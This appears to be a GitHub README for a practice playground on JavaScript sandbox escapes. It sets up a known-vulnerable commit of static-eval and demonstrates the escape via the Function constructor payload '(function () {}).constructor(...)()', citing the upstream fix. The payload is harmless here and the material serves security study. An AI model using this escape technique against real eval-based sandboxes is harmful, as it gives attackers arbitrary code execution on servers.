JS Sandbox Escape - Playground

This Playground is based on different JS Sandbox technique and it is useful to improve Sandbox escaping technique in JS context.

static-eval

Project

static-eval cloned from following commit

git clone [email protected]:browserify/static-eval.git
git checkout c0e719f6b689b5c0f9fc84125741509891ac10ca

Following vulnerability was fixed as described on static-eval PR-18

Reference
- maustin.net - Unsafe Code Execution in static-eval

Build

cd static-eval/
npm install

Test Case

$ cat eval.js 
var evaluate = require('../index.js');
var parse = require('esprima').parse;

var src = process.argv.slice(2).join(' ');
var ast = parse(src).body[0].expression;

console.log(evaluate(ast));

Normal Sandboxed Execution

math

node eval.js '1+1'
2

console.log

node eval.js 'console.log(1)'
undefined

Sandbox Escape Exploit Example

console.log

node eval.js '(function () {}).constructor("console.log(1)")()'
1

Name		Name	Last commit message	Last commit date
Latest commit History 5 Commits
static-eval		static-eval
.gitignore		.gitignore
README.md		README.md

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

JS Sandbox Escape - Playground

static-eval

Build

Test Case

Normal Sandboxed Execution

Sandbox Escape Exploit Example

About

Releases

Packages

Languages

rhpco/JS-Sandbox-Escape-Playground

Folders and files

Latest commit

History

Repository files navigation

JS Sandbox Escape - Playground

static-eval

Build

Test Case

Normal Sandboxed Execution

Sandbox Escape Exploit Example

About

Resources

Stars

Watchers

Forks

Releases

Packages 0

Languages

Packages